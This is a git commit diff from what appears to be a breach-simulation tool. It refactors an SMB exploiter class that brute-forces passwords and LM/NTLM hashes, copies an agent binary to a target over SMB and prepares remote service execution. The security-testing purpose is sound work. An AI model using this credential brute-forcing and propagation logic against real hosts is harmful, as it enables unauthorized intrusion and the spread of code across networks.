Agent: Extract method _exploit

This commit is contained in:
Kekoa Kaaikala 2022-10-06 14:14:38 +00:00
parent e2453e481c
commit 156300e8ed
1 changed files with 64 additions and 48 deletions

View File

@ -1,4 +1,7 @@
from dataclasses import dataclass
from logging import getLogger
from pathlib import PurePath
from typing import Optional, Tuple
from impacket.dcerpc.v5 import scmr, transport
from impacket.dcerpc.v5.scmr import DCERPCSessionError
@ -21,6 +24,14 @@ from infection_monkey.utils.threading import interruptible_iter
logger = getLogger(__name__)
@dataclass
class SelectedCredentials:
user: str
password: str
lm_hash: str
ntlm_hash: str
class SMBExploiter(HostExploiter):
_EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = {
@ -31,51 +42,9 @@ class SMBExploiter(HostExploiter):
SMB_SERVICE_NAME = "InfectionMonkey"
def _exploit_host(self):
agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
dest_path = get_agent_dst_path(self.host)
creds = generate_brute_force_combinations(self.options["credentials"])
for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt):
creds_for_log = get_credential_string([user, password, lm_hash, ntlm_hash])
try:
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(
self.host,
agent_binary,
dest_path,
user,
password,
lm_hash,
ntlm_hash,
self.options["smb_download_timeout"],
)
if remote_full_path is not None:
logger.info(
f"Successfully logged in to {self.host.ip_addr} using SMB "
f"with {creds_for_log}"
)
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.add_vuln_port(
"%s or %s"
% (
SMBExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
SMBExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
)
)
self.exploit_result.exploitation_success = True
break
else:
# failed exploiting with this user/pass
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
except Exception as exc:
logger.error(
f"Error while trying to copy file using SMB to {self.host.ip_addr} with "
f"{creds_for_log}:{exc}"
)
continue
remote_full_path, creds = self._exploit(dest_path)
if not self.exploit_result.exploitation_success:
if self._is_interrupted():
@ -109,11 +78,11 @@ class SMBExploiter(HostExploiter):
if hasattr(rpctransport, "set_credentials"):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(
user,
get_plaintext(password),
creds.user,
get_plaintext(creds.password),
"",
get_plaintext(lm_hash),
get_plaintext(ntlm_hash),
get_plaintext(creds.lm_hash),
get_plaintext(creds.ntlm_hash),
None,
)
rpctransport.set_kerberos(SMBExploiter.USE_KERBEROS)
@ -190,3 +159,50 @@ class SMBExploiter(HostExploiter):
)
)
return self.exploit_result
def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials]:
agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
creds = generate_brute_force_combinations(self.options["credentials"])
for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt):
creds_for_log = get_credential_string([user, password, lm_hash, ntlm_hash])
try:
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(
self.host,
agent_binary,
dest_path,
user,
password,
lm_hash,
ntlm_hash,
self.options["smb_download_timeout"],
)
if remote_full_path is not None:
logger.info(
f"Successfully logged in to {self.host.ip_addr} using SMB "
f"with {creds_for_log}"
)
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.add_vuln_port(
"%s or %s"
% (
SMBExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
SMBExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
)
)
self.exploit_result.exploitation_success = True
break
else:
# failed exploiting with this user/pass
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
except Exception as exc:
logger.error(
f"Error while trying to copy file using SMB to {self.host.ip_addr} with "
f"{creds_for_log}:{exc}"
)
continue
return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash)